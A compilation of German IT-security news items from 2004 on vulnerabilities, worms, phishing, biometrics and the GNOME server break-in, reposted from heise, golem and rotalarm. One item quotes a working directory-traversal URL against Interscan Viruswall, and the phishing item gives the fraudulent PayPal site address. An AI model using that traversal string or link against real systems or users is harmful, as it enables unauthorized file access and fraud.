NEWS AUS DEM IT-SECURITY BEREICH

CeBIT: 3D-Gesichtserkennung von NEC



[font=Helvetica, Arial, Verdana, sans-serif][size=-1][/size][/font] Der japanische Elektronik-Konzern NEC präsentiert auf der CeBIT (Halle 2, Stand B10) eine 3D-Gesichtserkennungslösung, die derzeit bei der japanischen Polizei im Rahmen eines Feldversuchs genutzt wird. Das System -- der so genannte High-end Range Finder Fiore -- generiert aus zweidimensionalen Kamerabildern 3D-Gesichtsmodelle, die laut Hersteller eine deutlich höhere Erkennungswahrscheinlichkeit liefern sollen als herkömmliche Systeme.

Beim Fiore-System erfassen zunächst vier in einer Fotokabine installierte Kameras das rechte und linke Gesichtsbild einer Person. Die mit Längsstreifen versehenen 2D-Gesichtsaufnahmen werden anschließend vom Computer maskenförmig modelliert und zu einem 3D-Modell zusammengesetzt. Ein 3D-Viewer ermöglicht es, die Masken in drei verschiedenen Varianten darzustellen: Als Netzstruktur-Modell, in Form rein polygoner Daten, sowie als vollfarbiges Modell mit natürlichen Hauttönen.

Obwohl NEC betont, in Deutschland "nur von einer 1:1-Erkennung" zu reden, bewirbt das Unternehmen in seinen Prospekten den Vorteil einer 1:N-Erkennung mit Fiore: Über einen Mugshot Matching Processor lassen sich nämlich auch 2D-Gesichter, die beispielsweise von einer Überwachungskamera aufgenommen wurden, mit Bildmaterial aus einer 3D-Datenbank vergleichen. Die Wahrscheinlichkeit, mit der ein in 2D aufgenommenes Gesicht identifiziert wird, soll dann bei 96,5 Prozent liegen. NEC kooperiert eng mit der Bundesdruckerei und ist auch am Feldversuch BIOP II beteiligt, der momentan am Frankfurter Flughafen läuft.


http://www.heise.de/security/news/meldung/45937

##

CeBIT: Sicheres Linux für Industrie und Automation



Ein Embedded Linux mit zusätzlichen Sicherheits- und Gatewayfunktionen für den Einsatz in der Industrie stellt die Firma vantronix in Halle 6, Stand C52 vor. Zusammen mit dem Embedded-Systems-Hersteller SSV bieten die Hannoveraner vantronix ein Komplettpaket für den Einsatz als Gateway, Firewall oder VPN-Rechner in der Industrie und Fertigungstechnik an. Als Hardware für das AMSEL getaufte Produkt kommen ein Board mit einer AMD-CPU (ELAN SC520), 64 MByte Hauptspeicher und drei Ethernet-Interfaces zum Einsatz.

Das auf dem Linux-Kernel 2.4 basierende, sehr kompakte Betriebssystem passt mit 7,5 MByte vollständig in die 16 MByte Flashspeicher der Platine. Der Kernel wurde um mehrere Sicherheitspatches erweitert, die unter anderem einen Schutz vor Stack- und Overflow-Attacken enthalten. Der Administrator kann die Distribution sowohl über den integrierten Webserver als auch über SSH aus der Ferne verwalten. Zusätzlich benötigte Software kann über Compact-Flash-Karten nachgeladen werden, von denen mittels Bootmanager auch das System hochgefahren werden kann. (Christopher Kunz) /

##

Gnome-Server möglicherweise gecrackt



Nach Angaben des Entwicklerteams ist der Webserver des Open-Source-Projektes Gnome vermutlich gecrackt worden. Das Entwicklerteam hält es jedoch für "unwahrscheinlich", dass Quelltexte oder der Gnome-FTP-Server kompromittiert worden sind. Man hat zunächst einen provisorischen neuen Webserver aufgesetzt und will die Community laufend über neue Erkenntnisse informieren. Anfang März hatten die Entwickler des Desktop für Linux und Unix mit Gnome 2.5.90 die erste Beta der kommenden Version 2.6 vorgestellt.

Zuletzt waren im Dezember zwei Angriffe auf Server, die freie Software bereitstellen, bekannt geworden: der Savannah-Server der Free Software Foundation und ein rsync-Server der Linux-Distribution Gentoo. Zusammen mit den Debian-Systemen wurden Ende des vergangenen Jahres damit innerhalb weniger Wochen drei Infrastrukturknoten für freie Software angegriffen und kompromittiert.


http://www.heise.de/security/news/meldung/45948

###

Sicherheitslücke in Yahoo-Mail und Hotmail



Der Sicherheitsdienstleister GreyMagic hat in Yahoo!Mail und Hotmail einen Fehler bei der Filterung von HTML-Mails entdeckt, der in Kombination mit dem Internet Explorer zu einer Sicherheitslücke wird. Ein Angreifer kann die HTML+TIME-Funktion zur Steuerung von Dokumenten in HTML-Mails ausnutzen, um beliebigen Scripting Code im Browser des Opfers in dessen Kontext und der Sicherheitszone des Mail-Dienstes auszuführen. Das Lesen einer derart manipulierten Mail unter Yahoo oder Hotmail reicht dazu aus.

Nach Angaben von GreyMagic ließen sich damit die Authentisierungs-Cookies auslesen, so dass ein Angreifer damit die Identität seines Opfers übernehmen könne, um vollen Zugriff auf die Mail-Konten zu erhalten. Ein Proof-of-Concept-Exploit zur Demonstration der Lücke ist dem Advisory beigefügt. Beide Anbieter sind über das Problem informiert, Microsoft soll den Fehler in Hotmail auch bereits beseitigt haben.

Siehe dazu auch:

• Security Advisory von GreyMagic

http://www.heise.de/security/news/meldung/45962

####

Mehrere Schwachstellen in Ethereal



Stefan Esser hat ein Security-Advisory veröffentlicht, das auf mehrere Schwachstellen in Ethereal in den Versionen 0.8.13 bis einschließlich 0.10.2 hinweist. Die Open-Source-Software Ethereal ist ein Netzwerk-Protokoll-Analysator für Unix- und Windows-Plattformen, der Pakete in Echtzeit grafisch darstellen kann. Derzeit "versteht" Ethereal 472 verschiedene Protokolle in unterschiedlichen OSI-Schichten.

Insgesamt 13 Buffer Overflows sind in den Funktionen zur Dekodierung der Protokolle NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP und TCAP enthalten. Manipulierte Pakete können Ethereal zum Absturz bringen, prinzipiell lässt sich damit auch Code in verwundbare Systeme einschleusen und ausführen. Außerdem können auch spezielle RADIUS-Pakete den Analysator crashen lassen. Version 0.10.3 soll die Fehler beheben, allerdings steht sie derzeit noch nicht zum Download zur Verfügung. Sie soll aber im Laufe der Woche erscheinen.



Siehe dazu auch:

• Security Advisory auf ethereal.com
• Security Advisory von Stefan Esser

http://www.heise.de/security/news/meldung/45970


####


Norton Internet Security und Antispam verwundbar



[Security-Software & -Tools] NISR19042004b: Norton Internet Security Remote Command Execution (http://www.heise.de/newsticker/meldung/45852) Die Firma NGSsoftware hat zwei kritische Schwachstellen in den Symantec-Produkten Norton Internet Security und Norton Antispam entdeckt. Beide beruhen auf Fehlern in ActiveX-Controls, die mit den Produkten installiert werden. Da die Controls als Safe for Scripting markiert sind, können sie von beliebigen Web-Sites oder auch von speziell präparierten E-Mails missbraucht werden, um beliebigen Code auf den Systemen der Anwender auszuführen.

Bei Norton Antispam weist im Control SymSpamHelper die Methode LaunchCustomRuleWizard einen klassischen Buffer-Overflow-Fehler auf. Antispam ist auch Bestandteil von Norton Internet Security 2004, das mit WrapNISUM ein weiteres verwundbares ActiveX-Control enthält. Ein Angreifer kann dort die Methode LaunchURL missbrauchen, um den Browser beliebige Programme auf dem Rechner des Opfers starten zu lassen. NGSsoftware schätzt beide Lücken als kritisch ein, lobt aber die prompte Reaktion des Herstellers, der innerhalb von zwei Wochen Updates zur Verfügung gestellt hat, die automatisch via LiveUpdate installiert werden.

http://www.rotalarm.de/
Neuer UDP-basierter Wurm "Witty" verbreitet sich



[Viren & Würmer] (http://CERT.Uni-Stuttgart.DE/ticker/article.php?mid=1189) Ein UDP-basierter Wurm, genannt "Witty" alias W32.Witty.Worm, W32/Witty.worm, WORM_WITTY.A oder auch "Blackworm", verbreitet sich seit dem 19. März. Laut ISC SANS sind Microsoft-Windows-Systeme mit den ISS-Produkten BlackICE und RealSecure in den eingangs genannten Versionen anfällig. Der Wurm nutzt die von eEye bekanntgegebene Schwachstelle für den Angriff aus.

Die verschickten UDP-Pakete haben in der überwältigenden Mehrheit als Quellport 4000, der Zielport ist zufällig gewählt (teilweise auch unter 1024), die Zieladresse ebenfalls. Die Paketgröße schwankt zwischen 769 und über 1250 Bytes. Alle Pakete enthalten die Zeichenkette insert witty message here. Ein Teil der Pakete hat andere Quellports außer 4000, die ebenfalls zufällig erscheinen. Diese Pakete werden wahrscheinlich durch NAT/Masquerading erzeugt, da dabei typischerweise der Quellport verändert wird. Damit der Angriff durch den Wurm erfolgreich ist, muß der Quellport allerdings 4000 sein, d.h. die durch NAT veränderten Pakete stellen keine Bedrohung für RealSecure- bzw. BlackICE-Systeme dar.

Wie beim Slammer-Wurm kann der Verkehr zu einem Denial-of-Service-Angriff auf die Netzanbindung betroffener Systeme führen. Sowohl die Bandbreite an sich als auch die zufällige Auswahl der Zieladressen können eine Überlastung der Netzkomponenten verursachen.

Zusätzlich überschreibt der Wurm zufällig ausgewählte Bereiche auf den Festplatten des Systems. Die Zerstörung betrifft auch Dateisystem-Metadaten. Mit der Zeit wird das System dadurch unbrauchbar und stürzt i.d.R. ab. Die Anzahl der aktiven, infizierten Systeme im Internet scheint inzwischen rückläufig zu sein. Während am 20. März noch 7 Angriffspakete pro Sekunde und 10'000 Zieladressen beobachtet wurden, liegt der Wert nun bei 0,6. Die Gesamtzahl aller infizierten Systeme beläuft sich mittlerweile allerdings auf mehrere zehntausend.

http://www.rotalarm.de/
Location Based Services: Ein Problem für den Datenschutz?



[Datenschutz] Schaar: "Kunden müssen umfassend informiert werden." (http://www.golem.de/0403/30469.html) Der Bundesbeauftragte für den Datenschutz, Peter Schaar, hat auf die datenschutzrechtlichen Anforderungen an die Ausgestaltung von Location Based Services (LBS) hingewiesen. Dabei könnten Datenpools entstehen, die nicht mehr zu kontrollieren seien, warnt Schaar.

Werden Dienstleistungen dem Nutzer in Abhängigkeit von seinem Standort zur Verfügung gestellt – etwa Hinweise auf Restaurants, Verkehrsinformationen, Einkaufshilfen, Suchfunktionen für Freunde –, ergeben sich aus Sicht des Datenschutzes erhebliche Risiken, so Schaar. So bestehe die Gefahr, dass Bewegungsprofile von Nutzern erstellt, zusammen mit Daten des persönlichen Lebensstils gespeichert und mit Informationen zum Kaufverhalten verknüpft und an Dritte weitergegeben werden.

Schaar fordert, dass die Anbieter die Nutzer von Location Based Services vorab umfassend darüber informieren, welche Daten erhoben, wie sie verarbeitet und an wen sie gegebenenfalls übermittelt werden. Zudem sei es datenschutzrechtlich zwingend, für die Übermittlung und Nutzung von Standortdaten die Einwilligung des Betroffenen einzuholen. Auch sollen Nutzer jederzeit die Möglichkeit haben, ihre Einwilligung zurückzuziehen. Darüber hinaus müssen auch die Kunden von LBS in der Lage sein, die Lokalisierung zeitweise oder auf Dauer abzuschalten. "Die Berücksichtigung des Datenschutzes liegt im Eigeninteresse der Anbieter. Ohne angemessenen Datenschutz wird den LBS der erwartete Erfolg versagt bleiben", erklärt Schaar, der auch auf die europäische Datenschutzrichtlinie für elektronische Kommunikation hinweist, die ausführliche Regelungen zu LBS enthalte, die bei der laufenden Novellierung des Telekommunikations-Gesetzes in Deutschland umgesetzt werden.

http://www.rotalarm.de/

Sicherheitslücke bei Web-Mail-Anbietern



[online/Browser/Email] GM#005-MC: Remotely Exploitable Cross-Site Scripting in Hotmail and Yahoo (http://www.intern.de/news/5436.html) HotMail, Yahoo und vermutliche etliche andere web-basierte Mail-Systeme sind (bzw. waren) nach Angaben des israelischen Sicherheitsunternehmens GreyMagic angreifbar. Bestehende Konten könnten durch den Versand von Mails an ihre Adresse manipuliert und übernommen werden. Dies wird durch ein Cross-Site-Scripting (CSS) möglich.

Das Sicherheitsunternehmen hat den Fehler am 6. März entdeckt. Danach wurden HotMail (Microsoft) und Yahoo umgehend über das Problem informiert. Microsoft hat den Fehler innerhalb von zwei Tagen behoben.

Alle Kontaktaufnahmen mit Yahoo scheiterten dagegen. Erst eine Kontaktaufnahme durch CNet konnte Yahoo auf das Problem aufmerksam machen. Ein "isoliertes Problem" war demnach dafür verantwortlich, dass Mails an die Adressen für Sicherheitsfragen des Dienstes "übersehen" wurden.

Die Sicherheitslücke trickst ansonsten vermutlich die meisten web-basierten Mail-Systeme aus. Laut Greymagic geben Dienste wie HotMail und Yahoo zwar ihr Bestes, um die Übertragung von (gefährlichem) HTML-Code zu unterbinden. Doch bei dieser neuen Sicherheitslücke werden die Filter der Mail-Dienste umgangen. Einem Angreifer wäre es möglich, die auf dem Konto gespeicherten Mails zu lesen oder zu bearbeiten. Das Konto könnte aber auch zum Versand von Spam oder Viren genutzt werden.

http://www.rotalarm.de/
Erneuter PayPal-Betrugsversuch



[Cyber-Crimes] Gefälschte E-Mail versucht unvorsichtigen PayPal-Kunden Passwörter abzuluchsen (http://www.golem.de/0311/28547.html) Einer angeblich von PayPal stammenden E-Mail an die Golem.de-Redaktion lässt sich entnehmen, dass erneut ein breit angelegter Betrugsversuch gegen die Nutzer des Online-Bezahldienstes stattfindet. Die HTML-E-Mail mit gefälschtem Absender und Betreffzeile Your PayPal account is under review... Please read. gaukelt dem Empfänger eine angeblich nötige Sicherheitsüberprüfung des PayPal-Accounts vor, lockt mit offiziell aussehendem Link, leitet aber auf einen fremden Webserver um – wer hier seine Daten eingibt, ist sein PayPal-Konto und dessen Inhalte vermutlich los.

Die gefälschte PayPal-E-Mail wird als Spam auch an Nicht-PayPal-Kunden versendet. Der Inhalt der Mail suggeriert, dass womöglich Dritte auf das eigene PayPal-Konto zugegriffen haben könnten: We recently reviewed your account, and suspect that your PayPal account may have been accessed by an unauthorized third party. Protecting the security of your account and of the PayPal network is our primary concern.

Aus Sicherheitsgründen gebe es deshalb im Moment nur beschränkten Zugriff auf das PayPal-Konto, was jedoch durch Eingabe von Benutzername und Passwort wieder behoben werden könne. Anstatt auf die in der E-Mail gezeigte PayPal-Web-Adresse zu verlinken, geht es allerdings zu der .ORG-Domain <http://www.tiest.org/paypal/Verify.htm>, wo man dann aufgefordert wird, sämtliche persönlichen und bankbezogenen Daten inkl. Kreditkarten-Nummer, E-Mail-Adresse und Passwort für den PayPal-Dienst anzugeben. In vergangenen Monaten gab es neben E-Mail-Betrugsversuchen gar schon mehrere speziell auf PayPal-Kunden abzielende Würmer: Mimail-I und -J bzw. "Paylap".

http://www.rotalarm.de/
Einbruch in den GNOME-Webserver



[Hacks & Incidents] GNOME-Quelltexte wahrscheinlich unversehrt (http://www.golem.de/0403/30483.html) Das GNOME-Team weist auf einen Einbruch in seinen Webserver www.gnome.org hin, auf dem auch andere Projekte gehostet werden.

Die Entwickler gehen derzeit davon aus, dass die Quelltexte des Linux/Unix-Desktops GNOME nicht verändert wurden. Man ist aber noch dabei, den Vorfall zu untersuchen. Die meisten Dienste, die auf der Maschine laufen, sollen in Kürze wieder zur Verfügung stehen. Angaben, wie es zu dem Einbruch in den Webserver kam, machte das GNOME-Team noch nicht.

http://www.rotalarm.de/
Neue Apache-Version schließt weitere Sicherheitslücken

[Serverprogramme] CAN-2004-0174, CAN-2003-0020, CAN-2004-0113 (http://www.heise.de/newsticker/meldung/45870) Die Apache Software Foundation hat die Apache-Version 2.0.49 veröffentlicht, die im Wesentlichen ein "Bug Fix Release" ist. Sie behebt insbesondere drei Sicherheitsprobleme: Unter AIX, Solaris und Tru64 können Netzwerk-Sockets in bestimmten Situationen blockieren, sodass Clients keine weiteren Verbindungen zum Apache aufnehmen können. Außerdem ist es nun nicht mehr möglich, beliebige Zeichenketten in den Error-Log-File zu schreiben, die Schwachstellen bei der Ansicht der Logs in Terminal-Emulatoren ausnutzten. Auch einen Speicherfehler in mod_ssl haben die Entwickler beseitigt, der zu einem sehr hohen Speicherverbrauch und gegebenenfalls zu einem Denial-of-Service führte.

http://www.rotalarm.de/

###

Schwachstelle in TrendMicros Interscan Viruswall [Update]





Der Sicherheitsspezialist Tri Huynh von SentryUnion hat auf Bugtraq ein Security Advisory veröffentlicht, das die Möglichkeit beschreibt, mit speziellen URL-Pfaden auf TrendMicros Interscan Viruswall beliebige Dateien einzusehen. Schuld daran ist der eingebaute Mini-Proxy/Webserver der für sogenannte Directory Traversals anfällig ist. Mit Pfadangaben wie http://viruswall:8080/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
kann ein Angreifer beispielsweise die autoexec.bat herunterladen. Errät er die Dateistruktur des Zielsystems, so lassen sich auch eventuell vertrauliche Daten einsehen.



Betroffen ist die Interscan Viruswall 3.5x unter Windows, andere Plattformen wurden nicht getestet, sind aber sehr wahrscheinlich ebenfalls verwundbar. Nach Angaben von Tri Huyn ist der Hersteller über das Problem informiert, hat aber noch nicht reagiert. Huyn empfiehlt, die Interscan Viruswall bis zum Erscheinen eines Patches zu deaktivieren. Allerdings sollte dieser Empfehlung lieber niemand Folge leisten: Immerhin schützt die Interscan Viruswall Unternehmensnetze vor Viren und bösartigem Code in E-Mails.

[Update] TrendMicro hat gegenüber heise Security das Problem bestätigt. Allerdings ist nur die Windows-Version betroffen, Viruswall für Unix-Plattformen ist nicht verwundbar. Der Hersteller will schnellstmöglich einen Hot Fix herausbringen, der den Fehler beseitigen soll.



Siehe dazu auch:

• Security Advisory auf Bugtraq

http://www.heise.de/security/news/meldung/45992


####


Unix/Linux-Desktop GNOME 2.6 erscheint am 31. März



Als Folge des mittlerweile bestätigten Einbruchs in den Webserver des GNOME-Projekts hat man den Freigabetermin für den Unix/Linux-Desktop GNOME 2.6 auf den 31.März verschoben. In einem Posting auf der GNOME-Mailingliste weist Jeff Waugh vom GNOME-Team aber darauf hin, dass der Sourcecode durch den Einbruch nicht in Mitleidenschaft gezogen oder verändert wurde. Dem Sysadmin-Team würde aber weiterhin Zeit gegeben, die Untersuchungen zu den Umständen des Einbruchs abzuschließen und die Server wieder in Betrieb zu setzen.

Bei der GNOME-Fangemeinde entschuldigt man sich derweil für die Verzögerungen, insbesondere weil die weltweit organisierten Release-Partys nun ausgefallen seien. Für weitere Details zum Release und zum Einbruch empfiehlt Waugh den Thread auf der Mailingliste zu verfolgen: Intrusion on [url]www.gnome.org[/url]

Siehe dazu auch:

• Gnome-Server möglicherweise gecrackt auf heise Security

http://www.heise.de/security/news/meldung/45996

###

Kerio stopft Sicherheitslücken in Mailserver und Firewall



In Kerios neuer Version 5.7.7 des MailServers ist ein Buffer Overflow im Spam-Filter beseitigt, mit dem Angreifer über das Netzwerk das System kompromittieren können. Der Hersteller hat dazu aber kein Advisory herausgegeben, sondern führt das Problem nur in seiner Release History auf.

Auch in Kerios WinRouteFirewall ist eine Schwachstelle ohne großes Aufsehen beseitigt worden: Ein Fehler im HTTP-Header-Parser bringt das System zum Absturz. Die bereits am 1. März veröffentlichte Version 5.1.10 behebt den Fehler. Nur eine kurze Notiz in der Change History weist auf das Problem hin.

Da Kerio nicht explizit auf Schwachstellen mit eigenen Advisories hinweist, sollten Anwender bei Erscheinen neuer Versionen in den Release Historys überprüfen, ob mögliche Sicherheitslücken beseitigt wurden.



Siehe dazu auch:

• Release History zu Kerio MailServer
• Release History zu Kerio WinRouteFirewall

http://www.heise.de/security/news/meldung/46003

######

Schily hält biometrische Grenzkontrollen in Frankfurt für sicher



[font=Helvetica, Arial, Verdana, sans-serif][size=-1][/size][/font] Bundesinnenminister Otto Schily (SPD) hat die bisherigen Erfahrungen mit der "Automatisierten und Biometriegestützten Grenzkontrolle" (ABG) am Frankfurter Flughafen positiv bewertet. In den ersten sechs Wochen nach dem Start am 12. Februar hätten sich bereits rund 4000 Reisende freiwillig für das Pilotprojekt beim Bundesgrenzschutz (BGS) gemeldet, sagte Schily am Donnerstag in Berlin. Bei dem zunächst auf sechs Monate angelegten ABG-Testlauf werden die Reisepassdaten sowie Iris-Merkmale der Teilnehmer beim BGS registriert. Bei Ein- und Ausreisen über spezielle Autocontrol-Spuren am Flugsteig B genügt dann ein Selbst-Einscannen der Reisedokumente sowie ein Blick in eine Iris-Kamera -- die übliche manuelle Grenzkontrolle durch BGS-Beamte findet nicht mehr statt.

Schily erwartet von dem Pilotprojekt vor allem Erkenntnisse zur "Erhöhung des Sicherheitsniveaus bei Grenzkontrollen". Auch soll mit dem Pilotprojekt die generelle Einsetzbarkeit sowie Akzeptanz biometrischer Verfahren untersucht werden. "Das erfreulich große Interesse belegt, dass die Bürgerinnen und Bürger keine Angst im Umgang mit der neuen Technik haben. Unter den fast 4000 Reisenden, die sich beim BGS mit ihrem maschinenlesbaren Reisepass und ihrer Augeniris bislang haben registrieren lassen, sind nicht nur deutsche Staatsbürger. Rund 300 dieser Teilnehmer kommen aus anderen EU-Staaten oder der Schweiz. Inzwischen gibt es auf dem Frankfurter Flughafen jeden Tag rund 100 Grenzübertritte, bei denen der kurze Blick in die Kamera für die Ein- oder Ausreise genügt. Biometrie ermöglicht so schnelle und sichere Grenzkontrollen", sagte Schily.

Unerwähnt bleibt allerdings die Tatsache, dass die Genauigkeit, mit der biometrische Kontrollsysteme arbeiten, derzeit bei maximal 99 Prozent liegt. Bei täglich 100 Grenzübertritten dürfte es somit allein rechnerisch zu mindestens einem Problemfall in 24 Stunden kommen. Weiterhin ungeklärt ist zudem die Frage der Überwindungssicherheit. Die in den ABG-Ausschreibungsunterlagen definierten Anforderungen der Überwindungssicherheit (gefordert war eine Lebenderkennung der Iris) wurden im Laufe des Vergabeverfahrens so weit abgeschwächt, dass es dem Innenministerium zuletzt genügte, dass die Hersteller lediglich eine Erklärung abgeben, dass ihr System überhaupt eine Lebenderkennung ermöglicht. Eine Prüfung der Überwindungssicherheit fand vor der Auftragsvergabe an Bosch Sicherheitssysteme nicht statt.


http://www.heise.de/security/news/meldung/46004


####

Visual C++ erzeugt verwundbaren Code



Das französiches Sicherheitsportal K-Otik meldet einen Fehler in Microsofts Visual C++ 6.0 und Visual Studio 6.0, der dazu führt, dass mit den Microsoft Foundation Classes (MFC) erstellte ISAPI-Erweiterungen (Internet Server Application Programming Interface) für Denial-of-Service-Attacken verwundbar sind. Der generierte Code kann bei POST-Request unter starker Serverlast ungültige Argumente übergeben, die Zugriffsverletzungen provozieren und eventuell die Applikationen zum Absturz bringen. Service Pack 6 für Visual Studio beseitigt den Fehler, alle betroffenen ISAPI-Erweiterungen müssen nach der Installation des Service Packs neu kompiliert werden.



Siehe dazu auch:

• Security Advisory auf K-otik

http://www.heise.de/security/news/meldung/46016

Mehrere Schwachstellen in HPs Web Jetadmin



In HPs Web Jetadmin zum Verwalten und Konfigurieren von Druckern im Netzwerk sind mehrere Fehler enthalten, die es Angreifern über das Netzwerk ermöglichen, das System zu kompromittieren. Web Jetadmin basiert auf einer modifizierten Version des Apache/Tomcat-Webservers, der lokal auf einem Rechner installiert wird und mittels Browser den Zugriff auf angeschlossene Drucker oder Scanner ermöglicht.

Der Webserver lässt sich auch für andere Benutzer freigeben, um etwa das Scannen im Netzerk zu ermöglichen. Aufgrund einiger Schwachstellen in Jetadmin kann ein Angreifer aber beliebige Daten auf das System hoch- und herunterladen, sofern Jetadmin nicht mit einem Passwort gesichert ist -- standardmäßig ist kein Passwort vergeben. Mit weiteren Tricks ist es möglich, eigene Skripte auf dem PC abzulegen und im SYSTEM-Kontext auszuführen. Betroffen ist die Windows-Version 7.5.2546 und vorherige.

Der Autor des auf Bugtraq veröffentlichten Advisories empfiehlt die Vergabe eines Passworts und nur die lokale IP-Adresse (127.0.0.1) für den Zugriff auf Jetadmin zuzulassen. HP ist über die Schwachstellen informiert und plant, einen Patch herauszubringen



Siehe dazu auch:

• Security Advisory auf Bugtraq

http://www.heise.de/security/news/meldung/46038


++++


Angebliches Leck in Chat-Client mIRC verunsichert Anwender



Meldungen über eine angebliche Schwachstelle in mIRC 6.14, für die bereits ein Exploit verfügbar sein soll, verunsichern derzeit weltweit Anwender. Dabei soll sich ein Fehler in der Verarbeitung von DCC-Requests ausnutzen lassen, um beliebigen Code auf das System eines Opfers zu schleusen und auszuführen. Ein Patch für die Lücke sei nicht verfügbar.

Die Meldung hat sich allerdings mittlerweile als falsch herausgestellt. Laut mirc.net kursiert zwar zurzeit ein Exploit, dieser richte sich aber wohl gegen ein Skript eines Drittherstellers. Laut QuakeNet soll es dabei um ein "CTCP VERSION reply changer script" handeln. Nähere Angaben dazu sind derzeit nicht verfügbar.

Ursprung des Gerüchts war die E-Mail eines GameSurge-IRC-Operators an das CERT-IRC, der auf einen Exploit gegen mIRC 6.14 hinwies. Mehrere Netze, unter anderem QuakeNET, DALnet und Undernet, verbreiteten diese Meldung weiter, da die Quelle bislang als zuverlässig galt. Ein funktionierender Exploit war zuletzt im Oktober 2003 für die mIRC-Version 6.11 aufgetaucht, der eine Lücke bei DCC-Request ausnutzte und Clients zum Absturz brachte.



Siehe dazu auch:

• NO mIRC Exploit auf mirc.net
• mIRC DCC exploits revisited auf IRC-Junkie
• mIRC DCC Bug - FALSE ALERT auf DALnet

http://www.heise.de/security/news/meldung/46030

Cisco warnt vor "Cisco Global Exploiter"



Cisco hat eine Meldung veröffentlicht, in der der Router-Marktführer vor dem kürzlich veröffentlichten Cisco Global Exploiter warnt. Die Software nutzt bekannte Schwachstellen in mehreren Cisco-Produkten aus:

• Cisco 677/678 Telnet Buffer Overflow Vulnerability
• Cisco IOS Router Denial of Service Vulnerability
• Cisco IOS HTTP Auth Vulnerability
• Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
• Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
• Cisco 675 Web Administration Denial of Service Vulnerability
• Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
• Cisco IOS Software HTTP Request Denial of Service Vulnerability
• Cisco 514 UDP Flood Denial of Service Vulnerability

Die Links zu den einzelnen Advisories sind der Original-Warnung von Cisco zu entnehmen, darin sind auch die anfälligen Produkte aufgeführt. Zu den Auswirkungen des Exploits, etwa ob damit der Zugriff auf das System möglich ist, macht Cisco keine näheren Angaben. Anwender sollten überprüfen, ob alle nötigen Updates eingespielt beziehungsweise Workarounds konfiguriert sind.



Siehe dazu auch:

• Warnung von Cisco
• Security Advisory auf netsys.comBugzilla

http://www.heise.de/security/news/meldung/46082

###

Red Hat beseitigt Lücke in Web-Proxy Squid



Red Hat hat neue Pakete für den Web-Proxy-Cache Squid herausgebracht, die eine Schwachstelle beseitigen sowie neue ACL-Funktionen einführen. Aufgrund eines Fehlers bei der Verarbeitung von %-codierten Zeichen in URLs ist es möglich auf Webseiten zuzugreifen, die eigentlich mit ACLs gesperrt sind. Betroffen ist Version 2.5.STABLE4 und vorherige.

Mit dem neuen ACL-Kontrolltypen "urllogin" ist es zukünftig möglich, URLs zu blocken, in denen Anmeldeinformationen eingebettet sind. Insbesondere der Internet Explorer machte bis zum letzten kumulativen Patch MS04-004 von dieser Möglichkeit Gebrauch. Leider nutzten auch Angreifer diese Möglichkeit, um Anwendern falsche URLs vorzugaukeln. ACLs sind unter Squid standardmäßig nicht aktiviert. Red Hat empfiehlt, die neuen Pakete zu installieren.

Siehe dazu auch:

• Security Advisory von Red Hat

http://www.heise.de/security/news/meldung/46080



###

Bagle-Nachwuchs ohne Ende



Eine neue Variante des Bagle-Wurms verbreitet sich seit dem heutigen Morgen. Im Unterschied zu den vorigen Varianten verschickt sich Bagle.U exklusiv als .exe-Attachment. Ansonsten unterscheidet sich die U-Variante wenig von seinen Vorgängern, allerdings ist diese Schädlingsmutation mit dem Packer FSG statt UPX komprimiert, was die Antiviren-Hersteller zur Nachbesserung ihrer Signaturen nötigte, damit die neue Variante erkannt wird.

Offenbar verbreitet sich der Schädling schon ziemlich rasant, sowohl MessageLabs als auch Norman haben die neue Variante als hohes Risiko eingestuft. MessageLabs hat am heutigen Nachmittag bereits über 6000 Exemplare des Schädlings abgefangen. Network Associates hat die Risiko-Einstufung von niedrig auf mittel erhöht. Anwender sollten also mal wieder ihre Viren-Signaturen aktualisieren, weitere Hinweise zu Viren und Würmern finden Sie auf den Antiviren-Seiten von heise Security.



Siehe dazu auch:

• Beschreibung zu Bagle.U von Network Associates
• Beschreibung zu Bagle.U von Norman

http://www.heise.de/security/news/meldung/46049

Schwachstelle in FreeBSD IPv6-Modul



Durch einen Fehler in der Funktion setsockopt zur Behandlung von IPv6-Socket-Options ist unter FreeBSD der unautorisierte Zugriff auf Teile des Speichers möglich. Damit ist ein Angreifer in der Lage, lokal -- oder über eine Remote-Shell -- Teile des Kernelspeicher auszulesen. Unter Umständen kann er auf diesem Wege vertrauliche Information ausspähen. Laut Advisory von FreeBSD lässt sich so auch das System zum Absturz bringen.

Betroffen ist FreeBSD 5.2-RELEASE.Die Entwickler empfehlen den verfügbaren Patch einzuspielen und den Kernel neu zu kompilieren oder IPv6 zu deaktivieren.

Siehe dazu auch:

• Security Advisory von FreeBSD

###

Fehler in Foren-Software phpBB



Ein Fehler bei der Filterung von Benutzereingaben im Skript privmsg.php der Foren-Software phpBB ermöglicht Angreifern die Übergabe eigener Kommandos an die darunter liegende SQL-Datenbank. Damit ist es möglich, beispielsweise in der Datenbank gepeicherte Passwort-Hashes auszulesen. Betroffen ist Version 2.0.8 sowie frühere. Ein Patch ist in einem eigenen Advisory der Entwickler von phpBB aufgeführt. Darin beschweren sie sich auch über die Vorgehensweise des Entdeckers der Lücke -- Janek Vind -- , der die Meldung auf Bugtraq veröffentlichte, ohne vorher das phpBB-Team zu informieren

Siehe dazu auch:

• Security Advisory auf phpBB
• Security Advisory auf Bugtraq

http://www.heise.de/security/news/meldung/46085

###

Bluetooth-Handys ferngesteuert



Ein neues, gravierendes Sicherheitsproblem mit diversen Bluetooth-Handys meldet der IT-Sicherheitsdienstleister Integralis. Demnach kann ein Angreifer mit einem Laptop oder PDA Gespräche auf diversen Handys mit Bluetooth-Schnittstelle absetzen, übernehmen und unterbrechen. Zudem kann er Telefonbucheinträge lesen und schreiben sowie Faxe und SMS-Nachrichten vom angegriffenen Handy abschicken. Es kann dabei selbst teure 0190er-Nummern auf Kosten seines Opfers anwählen.

Anders als beim so genannten Bluejacking ist weder eine vorhergehende Kopplung ("Pairing") noch Authentifizierung erforderlich, und der Besitzer des Handys hat kaum eine Chance den Angriff zu bemerken. Damit ist erstmals ein schwer wiegender Angriff auf Bluetooth-Geräte unter Vermeidung einer vorhergehenden Kopplungsprozedur möglich.

